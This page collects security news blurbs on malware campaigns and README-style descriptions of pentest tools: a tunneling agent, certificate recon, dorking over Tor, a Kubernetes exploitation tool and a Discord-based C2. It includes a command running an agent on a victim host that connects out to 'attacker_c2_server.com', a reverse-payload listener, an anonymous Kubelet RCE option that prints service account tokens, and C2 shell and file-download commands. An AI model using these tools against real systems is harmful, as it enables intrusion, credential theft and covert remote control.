navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.

Brute-force

navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.

Installation

git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build

Acknowledgements



FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network

The threat actor behind a peer-to-peer (P2P) botnet known as&nbsp;FritzFrog&nbsp;has made a return with a new variant that leverages the&nbsp;Log4Shell vulnerability&nbsp;to propagate internally within an already compromised network. "The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible," web infrastructure and security

Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

  • SYN are translated to connect() on remote
  • SYN-ACK is sent back if connect() succeed
  • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
  • Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng Β» session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] Β» ifconfig 
[...]
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Interface 3 β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Name β”‚ wlp3s0 β”‚
β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
β”‚ MTU β”‚ 1500 β”‚
β”‚ Flags β”‚ up|broadcast|multicast β”‚
β”‚ IPv4 Address β”‚ 192.168.0.30/24 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx MΓ©t MTU Γ‰tat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] Β» listener_list 
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Active listeners β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€ ───────────────────┬─────────────────────────
β”‚ # β”‚ AGENT β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€& #9508;
β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234 β”‚ 127.0.0.1:4321 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


CloudRecon - Finding assets from certificates

By: Zion3R


CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


Install

** You must have CGO enabled, and may have to install gcc to run CloudRecon**

sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.

The tool suite is three parts in GO:

Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.

Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.

Retr - a tool to parse and search through the downloaded certs for keywords.

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message

Subcommands:

cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

RETR

retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")


EasyEASM - Zero-dollar Attack Surface Management Tool

By: Zion3R


Zero-dollar attack surface management tool

featured at Black Hat Arsenal 2023 and Recon Village @ DEF CON 2023.

Description

Easy EASM is just that... the easiest to set-up tool to give your organization visibility into its external facing assets.

The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.

With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.


Installation

go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest

Example config file

The tool expects a configuration file named config.yml to be in the directory you are running from.

Here is example of this yaml file:

# EasyEASM configurations
runConfig:
domains: # List root domains here.
- example.com
- mydomain.com
slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.
discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.
runType: fast # Set to either fast (passive enum) or complete (active enumeration).
activeWordList: subdomainWordlist.txt
activeThreads: 100

Usage

To run the tool, fill out the config file: config.yml. Then, run the easyeasm module:

./easyeasm

After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!

Warranty

The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.

The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.

Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.

By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.

License

This project is licensed under the MIT License - see the LICENSE.md for details.

Contact

For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.



Iranian Hackers Using MuddyC2Go in Telecom Espionage Attacks Across Africa

The Iranian nation-state actor known as&nbsp;MuddyWater&nbsp;has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania. The Symantec Threat Hunter Team, part of Broadcom, is&nbsp;tracking&nbsp;the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt

SideCopy Exploiting WinRAR Flaw in Attacks Targeting Indian Government Entities

The Pakistan-linked threat actor known asΒ SideCopyΒ has been observed leveraging the recent WinRAR security vulnerability in its attacks targeting Indian government entities to deliver various remote access trojans such as AllaKore RAT, Ares RAT, and DRat. Enterprise security firm SEQRITE described the campaign as multi-platform, with the attacks also designed to infiltrate Linux systems with a

DorXNG - Next Generation DorX. Built By Dorks, For Dorks

By: Zion3R


DorXNG is a modern solution for harvesting OSINT data using advanced search engine operators through multiple upstream search providers. On the backend it leverages a purpose built containerized image of SearXNG, a self-hosted, hackable, privacy focused, meta-search engine.

Our SearXNG implementation routes all search queries over the Tor network while refreshing circuits every ten seconds with Tor's MaxCircuitDirtiness configuration directive. We have also disabled all of SearXNG's client side timeout features. These settings allow for evasion of search engine restrictions commonly encountered while issuing many repeated search queries.

The DorXNG client application is written in Python3, and interacts with the SearXNG API to issue search queries concurrently. It can even issue requests across multiple SearXNG instances. The resulting search results are stored in a SQLite3 database.


We have enabled every supported upstream search engine that allows advanced search operator queries:

  • Google
  • DuckDuckGo
  • Qwant
  • Bing
  • Brave
  • Startpage
  • Yahoo

For more information about what search engines SearXNG supports See: Configured Engines

Setup ️

LINUX ONLY ** Sorry Normies **

Install DorXNG

git clone https://github.com/researchanddestroy/dorxng
cd dorxng
pip install -r requirements.txt
./DorXNG.py -h

Download and Run Our Custom SearXNG Docker Container (at least one). Multiple SearXNG instances can be used. Use the --serverlist option with DorXNG. See: server.lst

When starting multiple containers wait at least a few seconds between starting each one.

docker run researchanddestroy/searxng:latest

If you would like to build the container yourself:

git clone https://github.com/researchanddestroy/searxng # The URL must be all lowercase for the build process to complete
cd searxng
DOCKER_BUILDKIT=1 make docker.build
docker images
docker run <image-id>

By default DorXNG has a hard coded server variable in parse_args.py which is set to the IP address that Docker will assign to the first container you run on your machine 172.17.0.2. This can be changed, or overwritten with --server or --serverlist.

Start Issuing Search Queries

./DorXNG.py -q 'search query'

Query the DorXNG Database

./DorXNG.py -D 'regex search string'

Instructions ο“–

-h, --help            show this help message and exit
-s SERVER, --server SERVER
DorXNG Server Instance - Example: 'https://172.17.0.2/search'
-S SERVERLIST, --serverlist SERVERLIST
Issue Search Queries Across a List of Servers - Format: Newline Delimited
-q QUERY, --query QUERY
Issue a Search Query - Examples: 'search query' | '!tch search query' | 'site:example.com intext:example'
-Q QUERYLIST, --querylist QUERYLIST
Iterate Through a Search Query List - Format: Newline Delimited
-n NUMBER, --number NUMBER
Define the Number of Page Result Iterations
-c CONCURRENT, --concurrent CONCURRENT
Define the Number of Concurrent Page Requests
-l LIMITDATABASE, --limitdatabase LIMITDATABASE
Set Maximum Database Size Limit - Starts New Database After Exceeded - Example: -- limitdatabase 10 (10k Database Entries) - Suggested Maximum Database Size is 50k
when doing Deep Recursion
-L LOOP, --loop LOOP Define the Number of Main Function Loop Iterations - Infinite Loop with 0
-d DATABASE, --database DATABASE
Specify SQL Database File - Default: 'dorxng.db'
-D DATABASEQUERY, --databasequery DATABASEQUERY
Issue Database Query - Format: Regex
-m MERGEDATABASE, --mergedatabase MERGEDATABASE
Merge SQL Database File - Example: --mergedatabase database.db
-t TIMEOUT, --timeout TIMEOUT
Specify Timeout Interval Between Requests - Default: 4 Seconds - Disable with 0
-r NONEWRESULTS, --nonewresults NONEWRESULTS
Specify Number of Iterations with No New Results - Default: 4 (3 Attempts) - Disable with 0
-v, --verbose Enable Verbose Output
-vv, --veryverbose Enable Very Ver bose Output - Displays Raw JSON Output

Tips 

Sometimes you will hit a Tor exit node that is already shunted by upstream search providers, causing you to receive a minimal amount of search results. Not to worry... Just keep firing off queries. ο˜‰

Keep your DorXNG SQL database file and rerun your command, or use the --loop switch to iterate the main function repeatedly. 

Most often, the more passes you make over a search query the more results you'll find. 

Also keep in mind that we have made a sacrifice in speed for a higher degree of data output. This is an OSINT project after all. ο”ŽοŒŽ

Each search query you make is being issued to 7 upstream search providers... Especially with --concurrent queries this generates a lot of upstream requests... So have patience.

Keep in mind that DorXNG will continue to append new search results to your database file. Use the --database switch to specify a database filename, the default filename is dorxng.db. This probably doesn't matter for most, but if you want to keep your OSINT investigations seperate it's there for you.

Four concurrent search requests seems to be the sweet spot. You can issue more, but the more queries you issue at a time the longer it takes to receive results. It also increases the likelihood you receive HTTP/429 Too Many Requests responses from upstream search providers on that specific Tor circuit.

If you start multiple SearXNG Docker containers too rapidly Tor connections may fail to establish. While initializing a container, a valid response from the Tor Connectivity Check function looks like this:

If you see anything other than that, or if you start to see HTTP/500 response codes coming back from the SearXNG monitor script (STDOUT in the container), kill the Docker container and spin up a new one.

HTTP/504 Gateway Time-out response codes within DorXNG are expected sometimes. This means the SearXNG instance did not receive a valid response back within one minute. That specific Tor curcuit is probably too slow. Just keep going!

There really isn't a reason to run a ton of these containers... Yet... ο˜‰ How many you run really depends on what you're doing. Each container uses approximately 1.25GBs of RAM.

Running one container works perfectly fine, except you will likely miss search results. So use --loop and do not disable --timeout.

Running multiple containers is nice because each has its own Tor curcuit thats refreshing every 10 seconds.

When running --serverlist mode disable the --timeout feature so there is no delay between requests (The default delay interval is 4 seconds).

Keep in mind that the more containers you run the more memory you will need. This goes for deep recursion too... We have disabled Python's maximum recursion limit... ο”ο˜‰

The more recursions your command goes through without returning to main the more memory the process will consume. You may come back to find that the process has crashed with a Killed error message. If this happens your machine ran out of memory and killed the process. Not to worry though... Your database file is still good. 

If your database file gets exceptionally large it inevitably slows down the program and consumes more memory with each iteration...

Those Python Stack Frames are Thicc... ο‘ο˜…

We've seen a marked drop in performance with database files that exceed approximately 50 thousand entries.

The --limitdatabase option has been implemented to mitigate some of these memory consumption issues. Use it in combination with --loop to break deep recursive iteration inside iterator.py and restart from main right where you left off.

Once you have a series of database files you can merge them all (one at a time) with --mergedatabase. You can even merge them all into a new database file if you specify an unused filename with --database.

DO NOT merge data into a database that is currently being used by a running DorXNG process. This may cause errors and could potentially corrupt the database.

The included query.lst file is every dork that currently exists on the Google Hacking Database (GHDB). See: ghdb_scraper.py

We've already run through it for you... ο˜‰ Our ghdb.db file contains over one million entries and counting!  You can download it here ghdb.db if you'd like a copy. ο˜‰

Example of querying the ghdb.db database:

./DorXNG.py -d ghdb.db -D '^http.*\.sql$'

A rewrite of DorXNG in Golang is already in the works. ο˜‰ (GorXNG? | DorXNGNG?) ο˜†

We're gonna need more dorks... ο˜… Check out DorkGPT ο‘€

Examples ο’‘

Single Search Query

./DorXNG.py -q 'search query'

Concurrent Search Queries

./DorXNG.py -q 'search query' -c4

Page Iteration Mode

./DorXNG.py -q 'search query' -n4

Iterative Concurrent Search Queries

./DorXNG.py -q 'search query' -c4 -n64

Server List Iteration Mode

./DorXNG.py -S server.lst -q 'search query' -c4 -n64 -t0

Query List Iteration Mode

./DorXNG.py -Q query.lst -c4 -n64

Query and Server List Iteration

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0

Main Function Loop Iteration Mode

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L4

Infinite Main Function Loop Iteration Mode with a Database File Size Limit Set to 10k Entries

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L0 -l10

Merging a Database (One at a Time) into a New Database File

./DorXNG.py -d new-database.db -m dorxng.db

Merge All Database Files in the Current Working Directory into a New Database File

for i in `ls *.db`; do ./DorXNG.py -d new-database.db -m $i; done

Query a Database

./DorXNG.py -d new-database.db -D 'regex search string'


DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors

The threat actors behind theΒ DDoSiaΒ attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down. The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the

EndExt - Go Tool For Extracting All The Possible Endpoints From The JS Files

By: Zion3R


EndExt is a .go tool for extracting all the possible endpoints from the JS files

Idea

When you crawll all the JS files from waybackruls for example, or even collecting the JS files urls from your target website's home source page .. If the website was using API system and you wanna look for all the endpoints in the JS files, cuz u may find something hidden here or there .. That's why i made this tool .. I give it the JS files urls .. It graps all the possible endpoints or urls or paths in the submitted JS files for me ..


Installation

Just need to install go, run:

β–Ά brew install go
β–Ά git clone https://github.com/SirBugs/endext.git

or download from https://go.dev/dl/

Usage:

β–Ά go run main.go urls.txt


/$$$$$$$$ /$$ /$$$$$$$$ /$$
| $$_____/ | $$| $$_____/ | $$
| $$ /$$$$$$$ /$$$$$$$| $$ /$$ /$$ /$$$$$$
| $$$$$ | $$__ $$ /$$__ $$| $$$$$ | $$ /$$/|_ $$_/
| $$__/ | $$ \ $$| $$ | $$| $$__/ \ $$$$/ | $$
| $$ | $$ | $$| $$ | $$| $$ >$$ $$ | $$ /$$
| $$$$$$$$| $$ | $$| $$$$$$$| $$$$$$$$ /$$/\ $$ | $$$$/
|________/|__/ |__/ \_______/|________/|__/ \__/ \___/

EndPointExt Tool By @SirBugs .go Version
V: 1.0.2 Made With All Love
For Extracting all possilbe endpoints from Js files
Twitter@SirBagoza -- GitHub@SirBugs
Run : go run main.g o jsurls.txt

endpoints/users/password
sign-in
endpoints/sign-out
endpoints/billing/update-billing-info
endpoints/billing/get-account
endpoints/billing/create-account
endpoints/billing/list-subscriptions
endpoints/billing/create-new-subscription-purchase
endpoints/billing/create-one-time-payment
endpoints/billing/get-account
endpoints/billing/create-account
endpoints/billing/list-subscriptions
endpoints/billing/create-new-subscription-purchase
endpoints/billing/create-one-time-payment

One Line Command:

β–Ά echo 'target.com' | waybackurls | tee waybackresults.txt; cat waybackresults.txt | grep "\.js" > js_files.txt; go run main.go js_files.txt

// You can use Gau, HaKrawler, Katana, etc...

Credits

This tool was written in Golang 1.19.4, Made with all love in Egypt! <3

Twitter@SirBagoza , Github@SirBugs



Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer

A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang calledΒ RDStealer. "The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor VrabieΒ saidΒ in a technical report shared with The Hacker News. Evidence gathered by the Romanian

New Golang-based Skuld Malware Stealing Discord and Browser Data from Windows PCs

A new Golang-based information stealer calledΒ SkuldΒ has compromised Windows systems across Europe, Southeast Asia, and the U.S. "This new malware strain tries to steal sensitive information from its victims," Trellix researcher Ernesto FernΓ‘ndez ProvechoΒ saidΒ in a Tuesday analysis. "To accomplish this task, it searches for data stored in applications such as Discord and web browsers; information

Kubestroyer - Kubernetes Exploitation Tool

By: Zion3R

Kubestroyer

Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests


About The Project

Kubestroyer is a Golang exploitation tool that aims to take advantage of Kubernetes clusters misconfigurations.

The tool is scanning known Kubernetes ports that can be exposed as well as exploiting them.

Getting Started

To get a local copy up and running, follow these simple example steps.

Prerequisites

  • Go 1.19
    wget https://go.dev/dl/go1.19.4.linux-amd64.tar.gz
    tar -C /usr/local -xzf go1.19.4.linux-amd64.tar.gz

Installation

Use prebuilt binary

or

Using go install command :

$ go install github.com/Rolix44/Kubestroyer@latest

or

build from source:

  1. Clone the repo
    $ git clone https://github.com/Rolix44/Kubestroyer.git
  2. build the binary
    $ go build -o Kubestroyer cmd/kubestroyer/main.go 

Usage

Parameter Description Mand/opt Example
-t / --target Target (IP, domain or file) Mandatory -t localhost,127.0.0.1 / -t ./domain.txt
--node-scan Enable node port scanning (port 30000 to 32767) Optionnal -t localhost --node-scan
--anon-rce RCE using Kubelet API anonymous auth Optionnal -t localhost --anon-rce
-x Command to execute when using RCE (display service account token by default) Optionnal -t localhost --anon-rce -x "ls -al"

Currently supported features

  • Target

    • List of multiple targets
    • Input file as target
  • Scanning

    • Known ports scan
    • Node port scan (30000 to 32767)
    • Port description
  • Vulnerabilities

    • Annon RCE on Kubelet
      • Choose command to execute

Roadmap

  • Choose the pod for anon RCE
  • Etcd exploit
  • Kubelet read-only API parsing for information disclosure

See the open issues for a full list of proposed features (and known issues).

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See LICENSE.txt for more information.

Contact

Rolix - @Rolix_cy - rolixcy@protonmail.com

Project Link: https://github.com/Rolix44/Kubestroyer



DCVC2 - A Golang Discord C2 Unlike Any Other

By: Zion3R


This multi operating system compatible tool was created to leverage Discord's voice channels for command and control operations. This tool operates entirely over the Real-Time Protocol (RTP) primarily leveraging DiscordGo and leaves no pesky traces behind in text channels. It is a command line based tool meaning all operations will occur strictly from the terminal on either Windows/Linux/OSX. Please use responsibly but have fun! ;)


Requirements:

  1. Updated (wrong link before) Read about DCVC2
  2. You need a Discord account.
  3. You need a Discord server.
  4. Increase voice chat speed to 96kbps in settings.
  5. You need 2 Discord bots. I found it easiest to give both bots admin perms over the discord server but you can fine tune them to only need voice permissions. The best guide to create bots is here.

Build:

git clone https://github.com/3NailsInfoSec/DCVC2.git
cd DCVC2
go mod download
go build server.go
go build agent.go

Usage:

When you execute the server and agent you should see both join the voice channel you specify:

Shell commands:

cmd> whoami

desktop-3kjj3kj\sm00v

I added 2 hardcoded additions besides basic shell usage:

cmd> screenshot
screenshotting..............................................

&

cmd> download
download file path>C:\Users\sm00v\Downloads\34954477.jpg
............................................................

Credits

Twitter: @sm00v

Github: @sm00v



New GobRAT Remote Access Trojan Targeting Linux Routers in Japan

Linux routers in Japan are the target of a new Golang remote access trojan (RAT) calledΒ GobRAT. "Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC)Β saidΒ in a report published today. The compromise of an internet-exposed router is followed by the

Hackers Using Golang Variant of Cobalt Strike to Target Apple macOS Systems

A Golang implementation of Cobalt Strike called Geacon is likely to garner the attention of threat actors looking to target Apple macOS systems. That's according to findings from SentinelOne, which observed an increase in the number of Geacon payloads appearing on VirusTotal in recent months. "While some of these are likely red-team operations, others bear the characteristics of genuine

